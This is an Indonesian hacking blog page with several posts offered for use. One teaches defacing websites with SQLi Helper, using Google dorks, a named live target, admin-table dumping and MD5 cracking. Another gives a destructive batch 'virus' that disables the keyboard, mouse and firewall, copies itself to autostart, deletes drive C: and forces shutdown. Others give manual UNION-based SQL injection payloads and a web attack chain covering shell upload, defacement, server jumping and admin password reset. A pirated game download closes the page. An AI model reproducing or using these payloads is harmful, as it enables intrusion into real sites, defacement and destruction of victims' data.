0 Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7

Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7 | Cirebon-Cyber4rt - Ada tutorial hacking website lagi nihlumayan SQL Injection. Kalo sebelumnya saya pernah share tentang Cara Deface Website Forum Sederhana Untuk Newbie yang tutorialnya pake skema "order+by+bla.. bla.. bla" nah sekarang saya akan share tentang cara deface lagi nih sob, tapi yang ini lebih mudah karena kita pake tools, jadi tinggal klak-klik aja juga kelar.

http://cirebon-cyber4rt.blogspot.com/2012/03/cara-deface-website-dengan-menggunakan_18.html
Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7

Tapi ada efek sampingnya juga pake cara ini, Bikin Orang Jadi Males hahaha :D Tapi kalo udah tau dasarnya yang pake "order+by+ bla... bla..." it's ok lah, yang penting kita tau jalannya klo disuruh manual, kalo belum tau cara manualnya baca ini dulu Cara Hacking Website Dengan Teknik SQL Injection :D

Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7
Yang pertama dan wajib ada yaitu Toolsnya:

Download Link :
Langkah kedua adalah mencari website yang vulnerabillity ( terdapat celah keamanan ), Lah carinya dimana? gampang sob, cari aja di Google :D ada banyak disana. Akh males nyarinya, yaudah nih aku kasih dorknya aja biar lebih mudah. Caranya? caranya masukan dork dibawah ini ke mesin pencarian Google, nanti muncul seribu satu macam website yang sama, nah tinggal kamu pilih satu-satu, cari yang vuln ( terdapat celah keamanan ), OK.

Google Dork SQL Injection :
  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:article.php?ID=
  • inurl:play_old.php?id=
  • inurl:games.php?id=
Maka akan muncul seribu satu macam website yang url-nya mirip seperti yang saya contohkan diatas. Sebenarnya masih banyak script atau dork SQL yang bisa kita dapatkan di internet. Nanti di artikel berikutnya, saya akan coba memberikannya secara lengkap untuk sobat.

Langkah ketiga, Sebelum memulai attacking kita harus menemukan website yang bisa dihack ( vulnerabillity ). Dari ribuan website dari dork yang saya berikan diatas, belum tentu salah satunya yang bisa dihack. Untuk mengetahuinya kita harus memberi tanda petik di akhir alamat website.
Contohhttp://www.wheelieboymotorsports.com/product_detail.php?pid=316 menjadi http://www.wheelieboymotorsports.com/product_detail.php?pid=316'. Jika terdapat tulisan :


Query failed.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname

Berarti Web tersebut Vuln.
Copy Url yang sobat dapatkan tadi ke kolom target.
Contoh: http://www.wheelieboymotorsports.com/product_detail.php?pid=316. ( tidak pakai tanda petik )


Kemudian klik Inject. Maka secara otomatis tools akan memeriksa ulang apakah url tersebut vuln atau tidak, versi database, supports union, dll. Jika Inject berhasil akan muncul tampilan seperti ini.


Kalau sudah klik Get Database.
*Di contoh muncul 2 Database name. Information schema dan natural. Pilih database selain Information schema. Seperti contoh dibawah, saya memilih database natural. Selanjutnya klik Get Tables.


Akan muncul beberapa list Tables yang ada. Sekarang tugas kita tinggal mencari tabel yang berisikan username dan password administratornya. Biasanya nama tabelnya tidak jauh-jauh dari admin_user, admin_login, atau apapun yang berbau informasi login admin.


Langkah Keempat, Kolom SQL
Jika sudah pilih User kalian klik get Coloumns.
Di Coloumns block yang usr_login dan usr_pass atau user_name dan password_admin lalu klik Dump Now.


Setelah itu akan muncul tampilan seperti ini


Pilih salah satu dari user login dan user password tersebut.
Ada yang aneh? Password yang ditampilkan bentuknya kok seperti ini ya?
  • 987d29241cc4f2a7465f2d9356ab3615
  • 987d29241cc4f2a7465f2d9356ab3615
Langkah Kelima, MD5 Password
Password tersebut dienkripsi dengan menggunakan metode MD5. Jadi kita harus menterjemahkan kode tersebut menjadi password yang sebenarnya. Nah, bagaimana caranya?

Caranya cukup mudah, buka saja situs MD5 Crack, lalu masukkan kode tersebut dikotak penelusuran. Berdo'a saja password yang sobat dapatkan tersebut cukup lemah, sehingga bisa dipecahkan dengan metode Bruto Force. Setelah sobat masukkan, lalu klik Crack hash baby.

Selesai. sekarang cari halaman login atau adminnya.
Ada beberapa contoh halaman login yang bisa sobat pakai

http://target.com/admin.htmlhttp://target.com/admin.php
NOTE - Bagi yang PC nya kedetect virus atau takut PC nya kena virus, bisa pake sandboxie biar lebih aman Click Here

Sekian postingan saya kali ini tentang Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7 , mungkin bagi yang belum tau teknik SQLi Injection cara diatas masih sangat sulit untuk dipahami, tapi saya yakin dengan latihan dan ketekunan pasti sobat akan paham.

0 Membuat Virus Sederhana dengan Menggunakan Notepad

Cirebon-Cyber4rt - Mungkin ini sedikit berguna buat sobat-sobat yang suka bermain dengan virus yang memakai ekstensi .bat. ya udah kita mulai praktekan aja yah... hehehe :D
Script virus berekstensi .bat hanya terdiri dari beberapa kata perintah seperti echo, pause, cls dan beberapa script perintah jika kita ingin bermain diregistri komputer.

Cirebon-Cyber4rt

Saya tidak menyarankan anda untuk menjalankan virus ini dikomputer sendiri ! Virus ini dibuat dengan Notepad dan di save as dengan ekstension .bat Jangan lupa untuk merubah Save as type menjadi All files.


Invisible command
@echo off
Swap mouse
rundll32 user,swapmousebutton
Buka URL yg diinginkan
start [url]http://www.google.com[/url]
Shutdown kmptr & beri pesan
shutdown -s -t 10 -c "YOUR MESSAGE HERE" -f
Disable mouse setelah Restart
rundll32 mouse,disable
Disable keyboard setelah Restart
rundll32 keyboard,disable
Freezes komputer setelah Restart
rundll32 user,disableoemlayer


Memperbanyak Diri di Dalam Direktori
ctty nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul"

Me-replace File Batch yang Lain
%0 >>other.bat

Trojan

Mengirim daftar file dalam direktori
dir *.*>>Filelist.txt
Ganti Password Admin
net user administrator PASSWORD HERE
Membuat Info IP
ipconfig >Computer-IP-address.txt


Copy ke Autorun
COPY %0 %windir%WINSTART.BAT
Format Drive C
format c: /q /autotest
Delete Windows
DELTREE /Y %windir%
Delete Drive C dengan Paksa
DEL /F /S /Q C:
Mematikan Firewall & Security Center
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0


Pause Sampai Tekan Sembarang Tombol
Pause
Pause 20 Detik
@ping.exe 127.0.0.1 -n 20 -w 1000 > nul


@echo off
cls
rundll32 mouse,disable
rundll32 keyboard,disable
COPY %0 %windir%WINSTART.BAT
net stop "Security Center"
net stop SharedAccess
echo Anda kena VIRUS!!!
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
start [url]http://www.youtube.com[/url]
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
DEL /F /S /Q C:
shutdown -s -t 10 -c "Ucapkan selamat tinggal pada komputermu!" -f

[-] Disables mouse & keyboard
[-] Copy ke AUTORUN
[-] Stop Security Center
[-] Display "Anda kena VIRUS!!!" selama 5 detik
[-] Starts [url]http://www.youtube.com[/url]
[-] Disable firewall
[-] Delete c: drive
[-] Force shutdown dengan pesan "Ucapkan selamat tinggal pada komputermu!"

Sekian postingan saya tentang Membuat Virus Sederhana dengan Menggunakan Notepad, Semoga tutorial diatas bisa bermnafaat bagi sobat :D

0 Cara Hacking Website Dengan Teknik SQL Injection

Pengertian SQL InjectionSQL Injection adalah sebuah aksi hacking yang dilakukan diaplikasi client dengan cara memodifikasi perintah SQL yang ada dimemori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.


Yang perlu diketahui sebelum melakukan SQL Injection pada MySQL:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: MySQL versi 5.x , tidak support untuk MySQL versi 4.x

[ Step 1 ]
  • Carilah target
    Misal: [site]/berita.php?id=100

    Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
    contoh:
    [site]/berita.php?id=100' atau
    [site]/berita.php?id=-100
    Sehingga muncul pesan error seperti berikut [ masih banyak lagi ]
[ Step 2 ]
  • Mencari dan menghitung jumlah table yang ada dalam databasenya...
    gunakan perintah: order by

    Contoh:

    [site]/berita.php?id=-100+order+by+1-- atau
    [site]/berita.php?id=-100+order+by+1/*

    Ceklah secara step by step (satupersatu)...
    Misal:

    [site]/berita.php?id=-100+order+by+1--
    [site]/berita.php?id=-100+order+by+2--
    [site]/berita.php?id=-100+order+by+3--
    [site]/berita.php?id=-100+order+by+4--

    Sehingga muncul error atau hilang pesan error...
    Misal: [site]/berita.php?id=-100+order+by+9--

    Berarti yang kita ambil adalah sampai angka 8
    Menjadi [site]/berita.php?id=-100+order+by+8--
[ Step 3 ]
  • untuk mengeluarkan angka berapa yang muncul gunakan perintah union
    karena tadi error sampai angka 9
    maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

    ok seumpama yg keluar angka 5

    gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
    misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
    [site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

    Lihat versi yang digunakan se'umpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

    Untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti versi 4 karena di versi 5 ini bisa menggunakan perintah From+Information_schema..
[ Step 4 ]
  • Untuk menampilkan table yang ada pada web tersebut adalah
    perintah table_name >>> dimasukan pada angka yangg keluar tadi
    perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

    Code:

    [site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

    Se'umpama table yang muncul adalah "admin"
[ Step 5 ]
  • untuk menampilkan semua isi dari table tersebut adalah
    perintah group_concat(table_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.​tables+where+table_schema=database()--
[ Step 6 ]
  • Perintah group_concat(column_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema​.columns+where+table_name=0xhexa--

    Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
    Website yg digunakan untuk konversi :

    http://www.v3n0m.net/ascii.htm

    Contoh kata yang ingin dikonversi yaitu admin maka akan menjadi 61646D696E

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema​.columns+where+table_name=0x61646D696E--
[ Step 7 ]
  • Memunculkan apa yang tadi telah dikeluarkan dari table yaitu dengan cara

    perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
    perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

    Contoh :

    [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

    Contoh kata yang keluar adalah id,username,password

    Contoh :

    [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--
[ Step 8 ]
  • Tahap terakhir mencari halaman admin atau login.
Sekian postingan saya kali ini tentang Cara Hacking Website Dengan Teknik SQL Injection, tutorial hacking yang lain akan menyusul, Jadi mampir terus kesini ya :D

Source: 
Hacker Newbie

0 Beberapa Pengertian-Pengertian Dasar dan Alur Web Attack

Beberapa Pengertian-Pengertian Dasar dan Alur Web AttackAda berbagai cara yang dilakukan oleh seorang hacker untuk mencari kelemahan sebuah sistem website. Sehingga mereka bisa menghack website tersebut. Ada berbagai tujuan seorang hacker dalam hack website mencuri informasi pengguna, sampai hanya sekedar iseng saja.


Gambaran Web Attack:
Scan > XPL/SQLi > Upload Shell > Deface/Jumping > Rooting

- Scan
  • Scan - Yaitu mencari tau dimana letak kelemahan web target. Bisa discan pake beberapa tool scanner. Diantar'a yang paling terkenal:
    Acunetix [ Windows ]
    Nikto [ Linux ]
    Selain dapat mendapatkan bug kita juga dengan tool itu akan dapat mengumpulkan informasi berguna dari web target.
- XPL/SQLi
  • XPL/SQLi -  Setelah kita dapat menemukan data-data dari web target. Kita coba cari cara untuk meng-Exploitasi bug-bug yang sudah kita temukan dengan tool scanner tadi. Dibawah ini adalah daftar situs yang menyediakan macam-macam Exploit:
    Exploit Database
    Inj3ct0r
    Packet Storm
    Apabila target menggunakan CMS Joomla/Wordpress, kita dapat mencari Exploit untuk plugin-plugin yang digunakan web target. Karena dengan tool scanner diatas kita diberikan informasi seakan-akan web target sudah dibedah keseluruhannya. Jadi kita tahu isi folder dari web target, termasuk plugin-plugin apa saja yang digunakan.
  • Kalau teknik SQLi dapat dilihat disini: SQLi Tutorial [ Download ]
- Upload Shell
  • Upload Shell -  Kalau Website sudah bisa di Exploitasi dan kita sudah bisa masuk ke halaman panel admin. Tinggal kita upload shellnya sekarang:
    Upload shell di Wordpress bisa mengupload plugin or thema yang sudah disisipi file shellnya.
    Upload shell di Joomla juga sama, cuma bisa juga menggunakan Plugin Ninja Explorer
    Upload Shell di CMS biasa bisa melalui menu upload gambar, kalau tidak bisa coba shellnya direname menjadi shell.php shell.jpg lalu upload.
    Setelah shell berhasil diupload tinggal panggil letak URL shellnya dimana.
- Deface/Jumping
  • Deface/Jumping - Kalau pengen gaya-gaya'an ( Deface ) Cari file index.php lalu ubah file didalamnya dengan script Deface yang kita punya. Bagi yang malas bikin script deface, dapat menggunakan tool Deface Maker Kemudian arsipkan website yang sudah kita deface disitus:
    Indonesian Defacer - Suspensed
    Magelang Cyber - Not Active
    Zone-h - Active
  • Tidak cukup hanya bisa men-Deface satu web saja. Coba gunakan teknik jumping untuk masuk ke web yang satu server sama web yang telah kita deface. Caranya ?
    Script Code: Click Here
    - Upload script jumpingnya
    - Rename menjadi jumpingfinder.php
    - Panggil letak file URL tersebut
    - Masuk ke public_html web target
    - Masuk ke MySQL nya [ Cari account MySQL difile config ]
    - Cari table user
    - Update password user admin
  • Dibawah ini ada script khusus untuk update user password admin:
    #Wordpress [ PHP Code ]
    UPDATE `note_wrdp1`.`wp_users` SET `user_pass` = '$P$BdEAI5H.T0REbjjKME506zOW03nggb0' WHERE `wp_users`.`ID` = 1 LIMIT 1;

    #Joomla [ PHP Code ]
    update `jos_users` set `password`="ece4f1e9e99fe6ca77c100d02cf4aa60" where `username`="admin"; 
  • Password admin sudah berhasil diupdate, tinggal ikuti seperti langkah nomor 3. 
- Rooting
  • Rooting - pada tahap ini kita bisa nyantai, karena semua step sudag terlewati.
Sekian postingan saya kali ini tentang Beberapa Pengertian-Pengertian Dasar dan Alur Web Attack, walau agak panjang penjelasannya, saya yakin sobat mengerti  :*

Source: Hacker Newbie 

0 Free Download Call Of Duty Modern Warfare 3

Free Download Call Of Duty Modern Warfare 3 - Pasti sobat sudah tahu Game paling populer di dunia ini, Call of Duty. Kali ini Call of Duty merilis versi terbarunya, yaitu Call of Duty Modern Warfare 3. Menurut saya, Call of Duty Modern Warfare 3 ini sudah memiliki efek dan grafik yang cukup bagus, bahkan bisa dibilang grafik dan kualitas suara dan gambar Call of Duty Modern Warfare 3 ini terbilang Sempurna dibandingkan dengan game sejenisnya. Seperti Counter Strike, Battlefield, Crysis, atau Point Blank.

Screenshot:


Minimum System Requirements:
  • Operating System Windows XP, Vista and 7
  • RAM 2 GB
  • VGA 256 MB Support Pixel Shader 3.0 - GeForce / ATI Radeon
  • 16 GB HDD Free Space
  • Processor: Intel Dual-Core 2.8 Ghz or Higher
  • DirectX 9.0 Compatible
Download Links: Call Of Duty Modern Warfare 3 | 5.8 GB
Password: mediafire-games4u

Sekian postingan saya kali ini tentang Free Download Call Of Duty Modern Warfare 3 , selamat bermain ya sob hehehe :D Jangan lupa follow blog ini ya !